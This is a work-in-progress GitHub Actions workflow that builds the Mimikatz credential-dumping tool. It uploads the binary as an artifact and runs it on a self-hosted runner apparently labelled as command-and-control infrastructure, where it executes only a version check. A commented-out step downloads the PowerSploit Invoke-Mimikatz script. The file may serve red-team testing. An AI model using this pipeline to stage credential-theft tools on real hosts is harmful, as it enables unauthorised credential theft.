# WIP, this workflow doesn't work
name: Exec Mimikatz

on:
#   push:
#     branches:
#       - main
  workflow_dispatch:
    inputs:
      hostlabels:
        description: 'The label of the host to execute'
        type: string
        required: true

jobs:
  build-mimikatz:
    runs-on: windows-2019

    steps:
      - name: mkdir publish
        run: |
          mkdir ./publish
          
      - name: Install Visual Studio 2013
        continue-on-error: true
        run: |
          choco install microsoft-build-tools --version 12.0.21005.20140416
          npm install -g --production --vs2013 windows-build-tools
#          choco install microsoft-build-tools-2013
#          choco install microsoft-build-tools-2015
#          choco install visualstudioexpress2013windowsdesktop

          
#      - name: Add msbuild to PATH
#        uses: microsoft/setup-msbuild@v2
#        with:
#          vs-version: '[12.0, 13.0)'  # VS2013

      - name: Add msbuild component to PATH
        run: |
          echo "VCTargetsPath=C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V140" >> $env:GITHUB_ENV

      - name: Checko Path
        run: |
          $env:VCTargetsPath
          dir "C:\Program Files (x86)\MSBuild\"
          dir "C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\"
          dir "C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V140\"

      - name: Build Mimikatz
        run: |
          git clone https://github.com/gentilkiwi/mimikatz.git
          cd mimikatz
          dotnet restore
          # TODO: ターゲットプラットフォームを対象ホストから自動的に決定する
          &"C:\Program Files (x86)\MSBuild\12.0\Bin\MSBuild.exe" mimikatz.sln /p:Configuration=Release /p:Platform=x64
          copy ./x64/mimikatz.exe ../publish/mimikatz.exe
#          C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe mimikatz.sln /p:Configuration=Release /p:Platform=x64

#      - name: Download Invoke-Mimikatz.ps1
#        #Invoke-WebRequest -Uri https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -OutFile ./mimikatz_trunk.zip
#        run: |
#          Invoke-WebRequest -Uri https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Exfiltration/Invoke-Mimikatz.ps1 -OutFile ./Invoke-Mimikatz.ps1
#          Move-Item ./Invoke-Mimikatz.ps1 ./publish

      - name: dir ./publish
        run: |
          dir ./publish
          
      - name: Upload artifacts
        uses: actions/upload-artifact@v4
        with:
          name: mimikatz-files
          path: ./publish
          
  exec-mimikatz:
    needs: build-mimikatz
    #runs-on: windows-latest
    runs-on: c2-win-20250501  # temp
    
    steps:
      - name: Download artifacts
        uses: actions/download-artifact@v4
        with:
          name: mimikatz-files

      - name: dir ./
        run: |
          dir ./

      - name: Display Mimikatz version
        run: |
          ./mimikatz.exe "version" "exit"
          
  
    
